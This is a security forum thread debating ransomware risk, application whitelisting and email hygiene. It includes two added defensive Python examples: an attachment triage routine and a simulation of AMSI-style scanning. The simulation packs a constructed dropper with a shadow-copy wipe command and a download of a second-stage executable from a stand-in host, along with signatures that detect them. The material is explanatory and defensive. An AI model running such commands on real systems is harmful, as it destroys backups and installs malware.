Interesting AntiRansomware freeware

Discussion in 'other anti-malware software' started by Windows_Security, Dec 30, 2016.

  1. Dan, it just does not make sense when you place this research data in real-world perspective.

    The AV industry is a 75 billion market (annually). When the infection risk is that high, common cause-effect logic would stop people spending money on security. When the risk of, for instance, ransomware alone is that high (nearly 50%), it would not make sense to spend money on something which clearly does not deliver what it promises.

    Imagine this conversation between a CFO (Jane) and a CIO (Joe). Hey Joe, I was preparing the 2016 fiscal closing and noticed you spent X.9 million on security, and today I lost all my data due to a ransomware infection. Well Jane, when we have paid the ransom, I will show you a report which clearly states that companies have a near 50% ransomware infection rate (Joe). Last year (Joe continues) we had no infections at all and this year we just started unlucky.

    In a real-world situation, would you think the CIO would get away with such a data disaster by just handing over a research report, or would it be more likely that the CFO suggests a career change to the CIO?

    What is your take on this? (probably the PC should be locked when it is at risk) :D

    Regards Kees


    TIP to Wilders Members: instead of installing anti-ransom freeware as a second layer above, improve your first line of defense:

    1. Ask Dan (@VoodooShield) for a free license of VS and
    2. Ask Erik (@erikloman) for a free license of HPMA

    Your first base (proactive protection) should be covered more than adequately
     
    Last edited by a moderator: Jan 5, 2017
  2. VoodooShield

    I think there are several other things that need to be considered... for example red tape, budgets, all the work involved in deploying new software, and believe it or not, office politics (like maybe the CEO insists that the company use a security product from a buddy of theirs at a security company)... along with a lot of other factors. For example, one reason companies are reluctant to implement traditional application whitelisting is because it can take 3-6 months to deploy, not to mention all of the end user headaches involved after it is deployed.

    Until recently, companies simply thought of malware as a cost of doing business, but ransomware and the widely publicized security breaches from the last year or two are total game changers. And this is not a guess on my part... I know this for certain because I have been talking to large companies that confirm this when they inquire about VS.

    So there have already been two major game changers (ransomware and the widely publicized security breaches), but the final game changer will be when someone holds a company accountable for not protecting their data, and the case goes to court. I was just talking with an accounting firm recently, and they were telling me that they are now accountable if their clients' data is stolen. They actually have to encrypt all of their data on their networks... there are actually "smash and grabs", where people steal physical servers and computers.

    At some point I am betting that we will reach a breaking point... and yes, all computers will be locked ;). Whether it is with VS or some other user-friendly lock, or some other magical technology that approaches 100% efficacy, the time is approaching.

    Here is a quick and dirty test... go to any computer repair shop and ask the techs how bad the malware situation is. They will tell you ;).
     
  3. VoodooShield

    BTW, I just thought of this, here is another way of viewing your social media analogy.

    How many people do you know who have NOT been affected by all of the widely publicized security breaches, and who do NOT get a shiny new credit card every 6 months? A handful of malware can do A LOT of damage.
     
  4. OverDivine

    Almost 10 years without an infection using only SRP (disallowed). Viruses, spyware, rootkits, keyloggers, trojans, etc. and now ransomware are just names to scare people. I wonder what will come next. If you get infected it's most of the time the user's fault. Also, just because it exists doesn't mean it is there to hurt you. I don't wear a kevlar vest or live in a bomb shelter.
     
  5. itman

    That research was directed to enterprise ransomware risk.

    A few years back, ransomware after its initial successes turned to enterprise mode. It's simple malware economics to target enterprises, since the payback and the odds of receiving it are much greater there. So I do agree that the odds of individual users being targeted are much lower. The individual user's risk lies with script kiddies and the like wanting to also cash in on the ransomware bonanza. The risk to individual users from amateur ransomware developer wannabes is not so much the ransomware as the risk of their garbage code inadvertently trashing your system.

    Finally, as the article points out, the vast majority of ransomware has been and is still being delivered via e-mail; I believe the figure was 96%. Mitigations there are avoiding webmail and using an e-mail client. Disable all live content rendering in the e-mail. Disable all auto attachment opening. Receive all e-mail in text mode only. And finally, employ a security solution that scans all incoming e-mail upon arrival. Note this requires a solution capable of decrypting e-mail so that it can be scanned prior to hitting your HDD.
     
    Last edited: Jan 5, 2017
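    Added example (editor's code, not part of itman's post): the three client-side rules above (text mode only, no live/HTML rendering, no auto-opened attachments) turned into a small triage routine over a MIME message, using Python's standard `email` package. The message, the extension lists and the `triage()` function are constructed for this illustration; a real client or gateway would also hand the attachment bytes to a scanner, which is the "scan on arrival" part of the post and is outside this snippet.

```python
"""Mail-client-side triage: render only text/plain, drop HTML, never auto-open
attachments, and flag attachments a dropper would use. Added example; the
message below is constructed for it and is not from the forum thread."""
import os
from email import policy
from email.parser import BytesParser

# Extensions the Windows shell or a scripting host will execute on double-click.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta",
                     ".ps1", ".cmd", ".bat", ".scr", ".exe", ".lnk"}
ARCHIVE_EXTENSIONS = {".zip", ".rar", ".7z"}
# Document extensions a dropper likes to hide behind ("Invoice.pdf.js").
DOCUMENT_EXTENSIONS = {".pdf", ".doc", ".docx", ".xls", ".xlsx", ".txt", ".jpg"}

# Constructed sample: multipart/alternative body plus a disguised script attachment.
RAW_MESSAGE = b"""From: "Accounts" <billing@example.invalid>
To: user@example.invalid
Subject: Invoice overdue
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="outer"

--outer
Content-Type: multipart/alternative; boundary="inner"

--inner
Content-Type: text/plain; charset="utf-8"

Please find the attached invoice and settle it today.

--inner
Content-Type: text/html; charset="utf-8"

<html><body><p>Please find the <a href="http://example.invalid/x">invoice</a>.</p>
<img src="http://example.invalid/track.gif"></body></html>

--inner--
--outer
Content-Type: application/octet-stream; name="Invoice_2017.pdf.js"
Content-Disposition: attachment; filename="Invoice_2017.pdf.js"
Content-Transfer-Encoding: base64

dmFyIHggPSAxOw==

--outer--
"""


def classify_attachment(filename):
    """Return the reasons an attachment must be quarantined instead of opened."""
    lower = filename.lower()
    stem, ext = os.path.splitext(lower)
    reasons = []
    if ext in SCRIPT_EXTENSIONS:
        reasons.append("executable/script extension " + ext)
    inner_ext = os.path.splitext(stem)[1]
    if inner_ext in DOCUMENT_EXTENSIONS and ext not in DOCUMENT_EXTENSIONS:
        reasons.append("double extension disguised as " + inner_ext)
    if ext in ARCHIVE_EXTENSIONS:
        reasons.append("archive; contents must be inspected before opening")
    return reasons


def triage(raw_bytes):
    """Parse one message the way a locked-down client should present it."""
    msg = BytesParser(policy=policy.default).parsebytes(raw_bytes)
    plain = msg.get_body(preferencelist=("plain",))
    html = msg.get_body(preferencelist=("html",))
    report = {
        # Only the text/plain part is ever rendered.
        "text": plain.get_content().strip() if plain else "",
        # The HTML alternative (remote images, links, scripts) is never rendered.
        "html_suppressed": html is not None,
        "attachments": [],
    }
    for part in msg.iter_attachments():
        name = part.get_filename() or "(unnamed)"
        reasons = classify_attachment(name)
        report["attachments"].append({
            "name": name,
            "size": len(part.get_content()),   # bytes decoded, never executed
            "quarantine": bool(reasons),
            "reasons": reasons,
        })
    return report


if __name__ == "__main__":
    import json
    print(json.dumps(triage(RAW_MESSAGE), indent=2))
```

    Usage: `triage(RAW_MESSAGE)` returns the plain text, a flag that an HTML part existed and was suppressed, and the attachment flagged for quarantine on two grounds (script extension and `.pdf.js` double extension). Note that `get_body()` already skips parts marked `Content-Disposition: attachment`, so a text/plain attachment does not get mistaken for the body.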
  6. guest

    +1
    last time I had issues with virus infection was with Windows XP sp1
    Since then no AV or security product has saved me from getting infected
     
  7. itman

    FYI - no company in its right mind is going to publicly disclose a security incident unless:

    1. They legally have to do so.

    2. The incident causes a loss of operating capability that the public can easily determine, e.g. a hospital shuts down elective surgeries and the like since it is a ransomware victim; news media publish incident details; etc.

    SOP for any company would be to blame the interruption in service on anything other than an internal security incident such as computer malware.

    -EDIT- If a company's CIO/SIO/IT Director is stupid enough to respond to surveys like this; fire him!

    Breaches vs. Incidents

    This report uses the following definitions:

    Incident: A security event that compromises the integrity, confidentiality or availability of an information asset.

    Breach: An incident that results in the confirmed disclosure (not just potential exposure) of data to an unauthorized party.

     
    Last edited: Jan 5, 2017
  8. @itman, You are 100% right, but this data is based on security companies mentioned on the cover, so it does not mean it is publicly disclosed. It is just confirmed numbers, no naming and shaming.
     
  9. boredog

    The company I worked for last year before retiring was hit by Poweliks. I had to fix my own computer. The IT people got fired.
    I got a shiny new credit card in 2016. My bank contacted me and said a business I had done business with was compromised. I did a little research and think it was Wendy's. My sister's computer is running Kubuntu. She was getting hit on Facebook a few times a week by fake ransomware. It locked her browser. At least she called me right away. I then installed Chromium and she has not been hit since. The only thing I still get hit with is those pesky page redirects now and then.
    A lot of those are caught by Malwarebytes 2.0. I can't use 3.0 yet.
     
  10. VoodooShield

    Some "serious companies" do lock their computers, but the vast majority currently do not. Virtualization is every bit as annoying to the end user as locking the computer... possibly more so, so I do not believe it is the answer. Besides, there is probably not one solution that is going to fix all of our problems.
     
  11. VoodooShield

    True, but my dog has not been sick in 10 years. Does that mean that no dogs have been sick in the last 10 years?

    I live in a seemingly crime free Kansas City suburb and used to date a girl who worked at the 911 emergency call center. Every year (since I can remember), we have heard how our county has one of the lowest crime rates in the nation... almost crime free. After dating her for a while, I was absolutely shocked to hear about all of the violent crimes that are constantly happening, while most people remain blissfully unaware.

    For 17 years I have been fixing computers and removing malware, mostly for 250-300 business clients. While it is absolutely true that some clients seem to not have any malware issues, the majority do... some more than others ;). One client in particular, I have known from the beginning (17 years). He runs a franchise office with just him and his wife, and they simply never had malware issues. About 5 years ago, when VS was first released, I mentioned that he should consider installing it on their 2 computers. He was reluctant and rationalized that they had never had a virus before, so they did not need to install VS. Well, about a year ago (so after 15 or so years of not getting a virus), they were hit hard. I cleaned up their computers, installed VS, and now they love it.

    I also have the advantage of being able to look at VS's user logs while working on my clients' computers to see what all had been blocked the last year or so. Trust me, malware is a full-blown epidemic. Just because you do not hear about it does not mean it does not happen... the people on the front line know that there is an epidemic going on.

    Edit: BTW, I totally agree... security companies should not be using the word "ransomware" as a scare tactic... especially if they are charging for their software without offering a free version... and especially if their software is not as effective as they initially hoped it would be (thereby keeping everyone believing that a holy grail actually exists in computer security).
     
    Last edited: Jan 5, 2017
  12. wat0114

    It just seems easiest to use an ad/script blocker and surf in a sandbox, either a 3rd party sandbox or O/S built-in sandbox, as well as back up important personal data. Throw in common sense when handling email and pretty much all bases are covered. At least that's what has been working flawlessly for me.
     
  13. WildByDesign

    Three very solid points there, Dan. I've added underlining in quote. There is a recent thread on Casey Smith's (subTee) Twitter page (https://twitter.com/subTee/status/815017113257648128) discussing Application Whitelisting (generally controlling application executions / locking) where some users discuss the pros and cons of doing that in large organizations at larger scale. Ultimately it comes down to putting the appropriate time and resources into achieving this, but it certainly is possible and most definitely a crucial element when it comes to computer security these days. Even though application whitelisting / anti-execution has been around for many years, it has become more and more important in recent years.

    Virtualization is great, no doubt, but it has its performance implications and also requires appropriate time, education and general resources.

    Point number three is a big one as well because with the increasing sophistication of malware coding (and financial motivation) of modern day hacking and links with organized crime, in this day and age users cannot get away with using one single security software program to stay protected. Although if I'm being completely honest, your own VoodooShield has been evolving as well with recent development to cover several layers of protection. 5+ years ago, I would have protected many of my clients' machines with a simple AV. But these days, AV takes a backseat and is more used for reactive work with analysis/forensics after-the-fact. For everyday home user clients, without a doubt, I would recommend VS as first line of defence because of what it achieves under-the-hood and for making that easy on the surface for users to understand from a UI perspective. Cheers, Dan, all the best in this new year!
     
  14. itman

    Historically and continuing, the majority of ransomware has employed script droppers to initiate the infection process. Scripts are effective because, besides their engines being Windows-trusted processes, they can and often do contain packed and obfuscated code that decrypts in memory. Some security solutions employ advanced memory scanners that can detect this activity. If they are honest about this capability, like Eset, they will publicly admit that this type of detection is post-infection and that remediation activity is one of containment versus prevention.

    Preventing script execution is an effective mitigation against this type of activity. However, the average user will not do this. Upgrading to Win 10 and using a security solution that utilizes the provided AMSI interface is the most straightforward way to stop these advanced scripts from executing: https://blogs.technet.microsoft.com...-application-developers-new-malware-defenses/

    The crux of the issue is that scripting engines can run code that was generated at runtime. This is where the new Antimalware Scan Interface comes in.

    While the malicious script might go through several passes of deobfuscation, it ultimately needs to supply the scripting engine with plain, unobfuscated code.

    When it gets to this point, the application can now call the new Windows AMSI APIs to request a scan of this unprotected content.
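    Added example (editor's code, not from itman's post or from Microsoft): a Python simulation of the point the quoted text makes. A three-opcode "script engine" stands in for wscript/PowerShell, a signature list stands in for the AV content scanner, and `scan_hook` is the AMSI insertion point: the engine hands every buffer to the scanner at the moment it has become plain text and is about to be interpreted. Real AMSI is a Windows C API (`AmsiScanBuffer`/`AmsiScanString`) called by the script host; the opcodes, the signatures and the dropper payload here are all constructed for the illustration.

```python
"""Why an on-disk scan misses a packed script dropper and an engine-level scan
hook (the AMSI model) does not. Added example; nothing here is from the thread."""
import base64
import re

# Constructed signatures: what a content scanner looks for in plain script text.
SIGNATURES = [
    re.compile(r"vssadmin\s+delete\s+shadows", re.I),   # shadow-copy wipe before encrypting
    re.compile(r"Invoke-WebRequest\s+\S+\.exe", re.I),  # second-stage download
]


def scan_plain_text(text):
    """Signature scan over one buffer. Returns the matched patterns (empty = clean)."""
    return [sig.pattern for sig in SIGNATURES if sig.search(text)]


class Blocked(Exception):
    """Raised by the engine when the scan hook flags a buffer before it runs."""


class ToyScriptEngine:
    """Stand-in for a Windows scripting host (wscript, PowerShell).

    Statements are ';'-separated. Three opcodes are enough to model a dropper:
      B64 <data>  decode base64 and run the result as a script
      REV <data>  reverse the string and run the result as a script
      RUN <cmd>   execute a plain command (recorded in self.executed)
    With scan_hook set, every buffer is scanned at the moment it becomes plain
    text and is about to be interpreted: that is the AMSI insertion point.
    """

    def __init__(self, scan_hook=None):
        self.scan_hook = scan_hook
        self.executed = []

    def run(self, script):
        if self.scan_hook:
            hits = self.scan_hook(script)
            if hits:
                raise Blocked(hits)
        for stmt in script.split(";"):
            op, _, arg = stmt.strip().partition(" ")
            if op == "B64":
                self.run(base64.b64decode(arg).decode())
            elif op == "REV":
                self.run(arg[::-1])
            elif op == "RUN":
                self.executed.append(arg)
            else:
                raise ValueError(f"unknown statement: {stmt!r}")
        return self.executed


def build_dropper(payload):
    """Wrap a plain payload in three obfuscation passes, as a dropper sits on disk."""
    layer1 = "B64 " + base64.b64encode(payload.encode()).decode()
    layer2 = "REV " + layer1[::-1]   # reversed base64 text contains no ';'
    return "B64 " + base64.b64encode(layer2.encode()).decode()


# Constructed payload: the two actions the signatures describe.
PAYLOAD = ("RUN vssadmin delete shadows /all /quiet;"
           "RUN Invoke-WebRequest http://example.invalid/stage2.exe -OutFile stage2.exe")
DROPPER = build_dropper(PAYLOAD)


def on_disk_scan_result():
    """What a scanner sees if it only reads the dropper file: the outer base64 layer."""
    return scan_plain_text(DROPPER)


def run_without_hook():
    """No engine-level scan: the dropper unpacks itself and both commands execute."""
    return ToyScriptEngine().run(DROPPER)


def run_with_hook():
    """AMSI-style hook: the same scanner sees the final plain buffer and blocks it."""
    try:
        ToyScriptEngine(scan_hook=scan_plain_text).run(DROPPER)
    except Blocked as exc:
        return exc.args[0]
    return []


if __name__ == "__main__":
    print("on-disk scan hits:", on_disk_scan_result())
    print("executed without hook:", run_without_hook())
    print("blocked by hook on:", run_with_hook())
```

    The scanner code is identical in both runs; only where it is called differs. That is the whole argument for AMSI in the quoted text: however many deobfuscation passes the dropper goes through, the last buffer handed to the engine is plain, and scanning there does not depend on recognising the packer.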
     
  15. VoodooShield

    Hey WBD, long time no talk, I hope you are doing well! Yeah, I totally agree, Casey explains application whitelisting quite nicely. When I was watching the video on his speech, I kept saying "I have been saying that for 5 years now" ;). I have also been saying this ;)... http://www.theregister.co.uk/2016/1...s_try_whitelists_not_just_bunk_antivirus_ids/

    Traditional antivirus has come a long way in the last 3-5 years... they have done some amazing things.

    But after hearing the question "I have antivirus software, how did I get a virus?" over 500 times, I finally realized that the people asking the question did not seem to realize that their AV software was not designed or intended to stop EVERYTHING.

    You should be able to ask a security software provider the following question... "Will your software, in theory, block all executable malware?" (obviously most will have to say no if they are being honest). At that point, it is up to the user if they want to add a lock to their computer or not.

    I will say, people are very, very odd... when they are first infected with malware, they totally freak out and it is their only concern. It only takes a week or so for them to once again become complacent. But if someone can design a lock that is user-friendly enough, we can overcome the complacency, and fix this issue.
     
  16. VoodooShield

    That setup sounds like it would work great for you... but what about the 60 year old teller at my bank who told me that she "knew nothing about computers". And when I asked her if she received email on her computer, she said "yeah, we do". True story.

    Your setup would not work for her... her computer needs to be locked down.
     
  17. OverDivine

    Of course it doesn't. But you can take all the dogs and give them standard vaccination or no vaccination at all; some of them will still get sick and some won't. Then new diseases appear and luckily there are vendors that have treatments for the new diseases. And you care about your dog and you want it to be healthy and happy. So you give him the new treatments. But there is a catch. Despite being the latest and best in reviews and tests, they are not working 100%. It may prevent your dog from getting sick, but there is a chance that it won't. And from time to time a new, scarier disease rises. I hope the dog is still healthy in the end.
     
  18. harsha_mic

    I am not sure if it is right question here. Since, dev's are active here now!! I will go ahead -

    Does anyone have any idea - ?
    How good (or is it any good), if Smart Screen in Windows 10 blocks -
    • Ransomware - ?
      • Initiated from Scripts - ?
    • Malware initiated from scripts - ?

    I am also curious if AMSI (as quoted by @itman) is integrated into Smart Screen? :)
     
  19. VoodooShield

    BTW, try this little experiment... think of the most novice computer user you know, and install VS for them. Spend 30 seconds with them, explaining that this little shield will lock their computer when they are at risk, and it will keep them safe. When you ask them how they like VS 2-3 weeks later, the odds are extremely high that you will not hear the word "annoying", but rather, you will hear the word "love".
     
  20. VoodooShield

    Hehehe, sorry, I am not being sarcastic here... but if I am reading you correctly, that is a rather strong argument in favor of locking the computer when it is at risk?
     
  21. VoodooShield

    Almost ALL AV software, including Windows Defender and SmartScreen, has come a VERY LONG way in the last couple of years (in reaction to the growing malware epidemic), and they do some amazing things, but they are not designed to be a lock, they are designed to be a filter... so there WILL be bypasses.

    But yeah, SmartScreen and Defender are pretty darn good now. Actually, VoodooAi is quite similar to SmartScreen in the way that it works... MS just needs to use about 10-15x the number of features and provide the user some file insight.

    Then again... do you want your bank, doctor's office, patent attorney's office, accounting office, etc., to have "pretty darn good" protection... or should their freaking computer be freaking locked when they are on the freaking internet ;).

    Not sure about your AMSI... itman can help you there!
     
  22. OverDivine

    Yes and no. Limiting user options for error is a great start. But there are dozens of software programs, one better than the other, and I think that none can protect you 100%. If there is a user there is a risk, and humans are prone to errors. Or maybe it is just luck depending on what is behind the next link you click. And all users are unique, and their knowledge about malware doesn't really matter. I mean some play the violin, pilot jet planes or whatever and they don't care about or don't have knowledge about malware. One can use all programs or no programs and still get infected. Software X protects you against ransomware, or so they say, but in reality it protects you only against some. For each user there is a different balance between their willingness or need to learn a new software/setup, their feeling of security and the ability to use their computer the way they want to use it.
     
  23. wat0114

    Agreed, computers in a corporate environment need to be locked down, although my comments were directed primarily toward security knowledgeable members of this forum, especially those who depend heavily on using multiple 3rd-party security applications.
     
  24. VoodooShield

    Ok, now repeat that experiment hundreds or thousands of times, and let me know how it goes, especially when your clients will take every opportunity to call you for a freebie ;). Keep in mind, you can switch to Smart or Always ON after a day or so.

    I really did not intend to join this conversation... I just wanted to post what I thought were the most representative and relevant malware stats (from Microsoft), which is worldwide, approximately 20% of endpoints encounter malware and approximately 8.6% are infected annually. Then again, keep in mind these are only the known / identified threats... but that is a TOTALLY different discussion. Either way, these stats are based on a minimum sample size of 100,000 end points (I believe per country), and obviously each of the end points had other random security software installed, in addition to the required Microsoft security products.

    But overall, my point is... if someone can create a user-friendly lock for the computer AND the end user feels more safe and secure, while constantly commenting how they love how the lock makes them feel safe and secure, then it is a win-win for everyone, right?

    Edit: BTW, assuming my math is correct (8.6% infections divided by 19.5% encounters), does this mean that the threat was blocked only 55.9% of the time? ;)
     
    Last edited: Jan 5, 2017